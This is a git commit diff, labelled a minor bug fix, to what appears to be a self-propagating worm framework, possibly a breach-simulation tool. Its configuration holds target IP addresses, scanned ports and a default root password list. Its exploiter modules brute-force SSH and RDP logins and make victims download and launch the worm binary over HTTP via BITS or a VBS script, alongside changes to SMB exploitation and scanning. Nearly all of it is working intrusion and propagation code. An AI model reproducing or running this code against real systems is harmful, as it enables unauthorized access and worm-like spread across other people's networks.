minor bug fix

This commit is contained in:
Barak Hoffer 2015-09-30 15:05:30 +03:00
parent 410891518f
commit 73f9821ee4
8 changed files with 39 additions and 16 deletions

View File

@ -96,6 +96,8 @@ class Configuration(object):
### monkey config ### monkey config
########################### ###########################
alive = True
singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}" singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"
# how long to wait between scan iterations # how long to wait between scan iterations
@ -127,11 +129,11 @@ class Configuration(object):
#range_class = RelativeRange #range_class = RelativeRange
range_size = 8 range_size = 8
range_class = ClassCRange range_class = FixedRange
range_fixed = ("10.0.0.1") range_fixed = ("10.0.0.9", "10.0.0.13", "192.168.1.100", "192.168.1.87")
# TCP Scanner # TCP Scanner
tcp_target_ports = [22, 445, 135] tcp_target_ports = [22, 445, 135, 3389]
tcp_scan_timeout = 1000 # 1000 Milliseconds tcp_scan_timeout = 1000 # 1000 Milliseconds
tcp_scan_interval = 200 tcp_scan_interval = 200
tcp_scan_get_banner = True tcp_scan_get_banner = True
@ -157,6 +159,7 @@ class Configuration(object):
ssh_user = "root" ssh_user = "root"
ssh_passwords = ["root", "toor", "1234", "12345678"] ssh_passwords = ["root", "toor", "1234", "12345678"]
alive = True #rdp exploiter
rdp_use_vbs_download = True
WormConfiguration = Configuration() WormConfiguration = Configuration()

View File

@ -11,7 +11,7 @@ from rdpy.core.error import RDPSecurityNegoFail
from logging import getLogger from logging import getLogger
from exploit import HostExploiter from exploit import HostExploiter
from exploit.tools import HTTPTools from exploit.tools import HTTPTools
from model import RDP_CMDLINE_HTTP_BITS from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
from model.host import VictimHost from model.host import VictimHost
from network.tools import check_port_tcp from network.tools import check_port_tcp
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
@ -243,7 +243,10 @@ class RdpExploiter(HostExploiter):
# create server for http download. # create server for http download.
http_path, http_thread = HTTPTools.create_transfer(host, src_path) http_path, http_thread = HTTPTools.create_transfer(host, src_path)
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(src_path), 'http_path' : http_path} if self._config.rdp_use_vbs_download:
command = RDP_CMDLINE_HTTP_VBS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
else:
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
passwords = list(self._config.psexec_passwords[:]) passwords = list(self._config.psexec_passwords[:])
known_password = host.get_credentials(self._config.psexec_user) known_password = host.get_credentials(self._config.psexec_user)
@ -288,10 +291,7 @@ class RdpExploiter(HostExploiter):
if not exploited: if not exploited:
LOG.debug("Exploiter RdpGrinder failed, rdp failed.") LOG.debug("Exploiter RdpGrinder failed, rdp failed.")
return False return False
elif http_thread.downloads == 0: elif http_thread.downloads == 0:
LOG.info("Trying rdp logging into victim %r with user"
" %s and password '%s'", host,
self._config.psexec_user, password)
LOG.debug("Exploiter RdpGrinder failed, http download failed.") LOG.debug("Exploiter RdpGrinder failed, http download failed.")
return False return False

View File

@ -3,6 +3,7 @@ from logging import getLogger
from model.host import VictimHost from model.host import VictimHost
from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
from exploit import HostExploiter from exploit import HostExploiter
from network.tools import check_port_tcp
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network import SMBFinger from network import SMBFinger
@ -49,7 +50,7 @@ class SmbExploiter(HostExploiter):
is_nb_open,_ = check_port_tcp(host.ip_addr, 139) is_nb_open,_ = check_port_tcp(host.ip_addr, 139)
if is_nb_open: if is_nb_open:
host.os['type'] = 'windows' host.os['type'] = 'windows'
return super(HostExploiter, self).is_os_supported(host) return host.os.get('type') in self._target_os_type
return False return False
def exploit_host(self, host, src_path=None): def exploit_host(self, host, src_path=None):

View File

@ -5,10 +5,12 @@ import logging
from exploit import HostExploiter from exploit import HostExploiter
from model import MONKEY_ARG from model import MONKEY_ARG
from exploit.tools import get_target_monkey from exploit.tools import get_target_monkey
from network.tools import check_port_tcp
__author__ = 'hoffer' __author__ = 'hoffer'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
SSH_PORT = 22
class SSHExploiter(HostExploiter): class SSHExploiter(HostExploiter):
_target_os_type = ['linux', None] _target_os_type = ['linux', None]
@ -20,6 +22,16 @@ class SSHExploiter(HostExploiter):
ssh = paramiko.SSHClient() ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
port = SSH_PORT
for servkey,servdata in host.services.items():
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
port = int(servkey.replace('tcp-',''))
is_open,_ = check_port_tcp(host.ip_addr, port)
if not is_open:
LOG.info("SSH port is closed on %r, skipping", host)
return False
passwords = list(self._config.ssh_passwords[:]) passwords = list(self._config.ssh_passwords[:])
known_password = host.get_credentials(self._config.ssh_user) known_password = host.get_credentials(self._config.ssh_user)
if known_password is not None: if known_password is not None:
@ -32,7 +44,8 @@ class SSHExploiter(HostExploiter):
try: try:
ssh.connect(host.ip_addr, ssh.connect(host.ip_addr,
username=self._config.ssh_user, username=self._config.ssh_user,
password=password) password=password,
port=port)
LOG.debug("Successfully logged in %r using SSH (%s : %s)", LOG.debug("Successfully logged in %r using SSH (%s : %s)",
host, self._config.ssh_user, password) host, self._config.ssh_user, password)

View File

@ -15,6 +15,7 @@ from model.host import VictimHost
from model import DROPPER_CMDLINE, MONKEY_CMDLINE from model import DROPPER_CMDLINE, MONKEY_CMDLINE
from exploit import HostExploiter from exploit import HostExploiter
from exploit.tools import SmbTools, get_target_monkey from exploit.tools import SmbTools, get_target_monkey
from network.tools import check_port_tcp
try: try:
from impacket import smb from impacket import smb

View File

@ -5,6 +5,7 @@ import logging
from network import HostScanner from network import HostScanner
from config import WormConfiguration from config import WormConfiguration
from info import local_ips from info import local_ips
from network.range import *
__author__ = 'itamar' __author__ = 'itamar'
@ -26,8 +27,12 @@ class NetworkScanner(object):
LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses) LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses)
self._ranges = [WormConfiguration.range_class(ip_address) # for fixed range, only scan once.
for ip_address in self._ip_addresses] if WormConfiguration.range_class is FixedRange:
self._ranges = [WormConfiguration.range_class('0.0.0.0')]
else:
self._ranges = [WormConfiguration.range_class(ip_address)
for ip_address in self._ip_addresses]
LOG.info("Base local networks to scan are: %r", self._ranges) LOG.info("Base local networks to scan are: %r", self._ranges)

View File

@ -13,7 +13,7 @@ from model.host import VictimHost
SSH_PORT = 22 SSH_PORT = 22
SSH_SERVICE = 'tcp-22' SSH_SERVICE = 'tcp-22'
SSH_REGEX = 'SSH-\d\.\d-OpenSSH' SSH_REGEX = 'SSH-\d\.\d-OpenSSH'
TIMEOUT = 30 TIMEOUT = 10
BANNER_READ = 1024 BANNER_READ = 1024
LINUX_DIST_SSH = ['ubuntu', 'debian'] LINUX_DIST_SSH = ['ubuntu', 'debian']

View File

@ -1,7 +1,7 @@
import socket import socket
import select import select
DEFAULT_TIMEOUT = 30 DEFAULT_TIMEOUT = 10
BANNER_READ = 1024 BANNER_READ = 1024
def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False): def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):